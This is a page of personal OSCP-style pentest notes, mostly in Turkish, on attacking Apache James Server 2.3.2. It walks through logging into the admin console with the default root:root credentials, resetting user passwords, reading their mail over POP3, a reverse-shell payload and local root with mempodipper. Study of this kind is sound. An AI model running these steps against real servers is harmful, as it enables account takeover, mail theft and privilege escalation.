messy security notes
  • security is an illision
  • Useful Blog Links
  • Windows
    • ad-101
    • MS17-010
    • SMB
    • Post Exploitation Tricks
    • DCOM/RPC
    • Basic Commands
    • SMB Enumeration
  • Linux
    • SUID Set Edilmiş servicectl Abuse Etme
    • sudoers dosyası bozulursa?
    • SSH Welcome Message and Banner
    • pkexec ve pkttyagent
    • vipw , vigr , visudo
    • IP Forwarding
    • İki NIC Arasında Port Yönlendirme
    • tasksel
    • LAMP
    • Find All SUID Bit
    • Linux Operatorler
    • IFS
    • Ssh Public Key Tricks
    • Local & Remote Port Forwarding
    • Linux Priv Esc
    • Static IP
  • POST EXPLOITATION
    • from external network to domain admin
    • post exp 2
  • OSCP
  • Temel Komutlar ve Araçlar
  • Zayıf Servisler
  • Örnek Bir Senaryo
  • Parola Saldırıları
  • ms17-010 python exploit
  • Full Interactive Shell
  • Notes*
  • Apache James Server 2.3.2 Exploit
  • windows exploit suggester
  • FreeBsd and Some PHP tricks
  • fundamental blog
  • Metasoloit & Meterpreter & msfvenom
  • at-tftp server 1.9
  • Tunneling and Forwarding
  • Common Exploits
  • Windows Servisler
  • Execute process as another user
  • Teorik
    • Authentication and Authorization
    • Kullanıcı Hesap Türleri ve Hakları
    • Kerberos
  • SYSTEM
    • Apache2
    • Bind9 Log
    • apache - basic auth - proxy
  • Buffer Overflow - BOF
    • BOF - Stack Based
    • BoF Links
  • BASH SCRIPTING
    • Samples
  • keepnote
  • Docker
    • Docker
  • Misc
    • 50-cloud-init.yaml
Powered by GitBook
On this page

Was this helpful?

Apache James Server 2.3.2 Exploit

PreviousNotes*Nextwindows exploit suggester

Last updated 5 years ago

Was this helpful?

james administrator varsayılan kullanıcı adı parola bilgisi root:root dur. Yönetici paneline bağlanmak için;

# telnet IP 4555
<!-- remote administrator tool 2.3.2 BANNER INFO -->
Login id:
root
Password:
root
<!-- login must be success. -->
listusers
setpassword <user> <pass>

Yukarıdaki komutlar ile ilgili kullanıcılar listelenir ve parola bilgisi resetlenir. Daha sonra 110 portan (pop3)'den bağlanılarak ilgili kullanıcılara ait mailler okunabilir.

# telnet IP 110
USER <username>
PASS <password>
<!-- if success -->
LIST
RETR <mail id>

exploiti çalıştırıldıktan sonra sisteme payloadı göndermektedir. Herhangi bir kullanıcı giriş yaparsa payload çalışacaktır. Paylaoada reverse shell eklenerek hedef makineden oturum alınabilir.

Başarılı bir şekilde reverse shell alındıktan sonra binary dizinleri path'e eklenir. Daha sonra kernel bilgisine bakılır. Kernel sürümü zafiyettinden etkilenmektedir. Bu zafiyet hedef makineye gönderilip gcc mempodipper.c -o mempodipper komutuyla derlenip çalıştırıldıktan sonra root shell alınır.

Apache James Server 2.3.2 - Remote Command Execution
mempodipper